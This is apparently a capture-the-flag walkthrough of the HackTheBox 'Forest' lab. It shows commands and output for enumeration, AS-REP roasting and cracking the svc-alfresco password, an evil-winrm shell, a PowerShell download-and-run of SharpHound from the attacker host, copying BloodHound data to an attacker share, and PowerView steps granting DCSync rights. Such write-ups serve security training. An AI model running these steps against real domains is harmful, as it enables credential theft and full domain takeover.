Forest

1. 정찰

1.1. nmap

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nmap -sC -sV 10.129.48.153
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-29 16:10 +04
Nmap scan report for 10.129.48.153
Host is up (0.36s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-29 12:18:55Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-29T12:19:17
|_  start_date: 2025-12-29T12:16:09
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2025-12-29T04:19:21-08:00
|_clock-skew: mean: 2h46m47s, deviation: 4h37m11s, median: 6m45s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.04 seconds

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# smbmap -H 10.129.48.153                      

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 0 authenticated session(s)                                                          
[!] Access denied on 10.129.48.153, no fun for you...                                                                        
[*] Closed 1 connections                                                                                                     
                                                                                                                                                                              
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# smbclient -N -L //10.129.48.153      
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.48.153 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# rpcclient -U ""%"" 10.129.48.153                     
rpcclient $> enudomusers
command not found: enudomusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> ^C

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# impacket-GetNPUsers 'HTB.LOCAL/' -usersfile users -outputfile hash -dc-ip 10.129.48.153 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6a1f04a504b902b5a18ce54c15facbad$970c94ada6d9a3f7573224bd26f4bfb90bd66041269fb243079c87ace5cbf0589eed5b1a10ce9f621307e8bb93b2b976fe7c4d53e72393a5c73c970e04ca147fa8cbbb695460fbbf253f95895d3cd2cd7b02cd499fe50813f624cda64b3762db8f5f6f898f6ea62061becaddfe7a43ad07360564d9ba3329ff399f58e1f273ba3ac26f8be28754f5b17acf85e2d4acc0dff6afeece90abc9c65d55cd8f1b70eb5556f52630e11e80ed1a815c02e3f89db9af86590db04b9a78ba76e1e4f9f08738e67bd40fa3db3e59f2d52b0d391ea9054a194a3b5c9573990a73b8de349814d61c2bd5e818
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                              
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# cat hash      
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6a1f04a504b902b5a18ce54c15facbad$970c94ada6d9a3f7573224bd26f4bfb90bd66041269fb243079c87ace5cbf0589eed5b1a10ce9f621307e8bb93b2b976fe7c4d53e72393a5c73c970e04ca147fa8cbbb695460fbbf253f95895d3cd2cd7b02cd499fe50813f624cda64b3762db8f5f6f898f6ea62061becaddfe7a43ad07360564d9ba3329ff399f58e1f273ba3ac26f8be28754f5b17acf85e2d4acc0dff6afeece90abc9c65d55cd8f1b70eb5556f52630e11e80ed1a815c02e3f89db9af86590db04b9a78ba76e1e4f9f08738e67bd40fa3db3e59f2d52b0d391ea9054a194a3b5c9573990a73b8de349814d61c2bd5e818

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

[...SNIP...]

$krb5asrep$23$svc-alfresco@HTB.LOCAL:6a1f04a504b902b5a18ce54c15facbad$970c94ada6d9a3f7573224bd26f4bfb90bd66041269fb243079c87ace5cbf0589eed5b1a10ce9f621307e8bb93b2b976fe7c4d53e72393a5c73c970e04ca147fa8cbbb695460fbbf253f95895d3cd2cd7b02cd499fe50813f624cda64b3762db8f5f6f898f6ea62061becaddfe7a43ad07360564d9ba3329ff399f58e1f273ba3ac26f8be28754f5b17acf85e2d4acc0dff6afeece90abc9c65d55cd8f1b70eb5556f52630e11e80ed1a815c02e3f89db9af86590db04b9a78ba76e1e4f9f08738e67bd40fa3db3e59f2d52b0d391ea9054a194a3b5c9573990a73b8de349814d61c2bd5e818:s3rvice

[...SNIP...]

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nxc smb 10.129.48.153 -u svc-alfresco -p s3rvice --shares             
SMB         10.129.48.153   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) 
SMB         10.129.48.153   445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.129.48.153   445    FOREST           [*] Enumerated shares
SMB         10.129.48.153   445    FOREST           Share           Permissions     Remark
SMB         10.129.48.153   445    FOREST           -----           -----------     ------
SMB         10.129.48.153   445    FOREST           ADMIN$                          Remote Admin
SMB         10.129.48.153   445    FOREST           C$                              Default share
SMB         10.129.48.153   445    FOREST           IPC$            READ            Remote IPC
SMB         10.129.48.153   445    FOREST           NETLOGON        READ            Logon server share 
SMB         10.129.48.153   445    FOREST           SYSVOL          READ            Logon server share 


┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nxc smb 10.129.48.153 -u svc-alfresco -p s3rvice --users 
SMB         10.129.48.153   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:False) 
SMB         10.129.48.153   445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.129.48.153   445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.48.153   445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain 
SMB         10.129.48.153   445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.129.48.153   445    FOREST           krbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account 
[...SNIP...]
SMB         10.129.48.153   445    FOREST           sebastien                     2019-09-20 00:29:59 0        
SMB         10.129.48.153   445    FOREST           lucinda                       2019-09-20 00:44:13 0        
SMB         10.129.48.153   445    FOREST           svc-alfresco                  2025-12-29 12:30:39 0        
SMB         10.129.48.153   445    FOREST           andy                          2019-09-22 22:44:16 0        
SMB         10.129.48.153   445    FOREST           mark                          2019-09-20 22:57:30 0        
SMB         10.129.48.153   445    FOREST           santi                         2019-09-20 23:02:55 0        
SMB         10.129.48.153   445    FOREST           [*] Enumerated 31 local users: HTB


┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nxc winrm 10.129.48.153 -u svc-alfresco -p s3rvice                         
WINRM       10.129.48.153   5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.48.153   5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

                                                                                                                                                                              
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# evil-winrm -i 10.129.48.153 -u svc-alfresco -p s3rvice                           
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type ..\Desktop\user.txt

┌──(root㉿kali)-[/home/kali/labs/forest]
└─# locate SharpHound.ps1
/usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1
/usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> iex(new-object net.webclient).downloadstring("http://10.10.14.143/SharpHound.ps1")
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        12/9/2025  11:19 PM          18734 20251209231944_BloodHound.zip
-a----       12/10/2025   3:51 AM          18831 20251210035124_BloodHound.zip
-a----       12/10/2025   3:51 AM          19745 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-ar---        12/9/2025   9:04 PM             34 user.txt

┌──(root㉿kali)-[/home/kali/labs/forest]
└─# impacket-smbserver share . -smb2support -username asdf -password asdf                                                
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net use \\10.10.14.143\share /u:asdf asdf
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> copy 20251210035124_BloodHound.zip \\10.10.14.143\share\
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> del 20251210035124_BloodHound.zip
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net use /d \\10.10.14.143\share
\\10.10.14.143\share was deleted successfully.


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/kali/labs/forest/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . .\PowerView.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
Updated on
Active
Jerry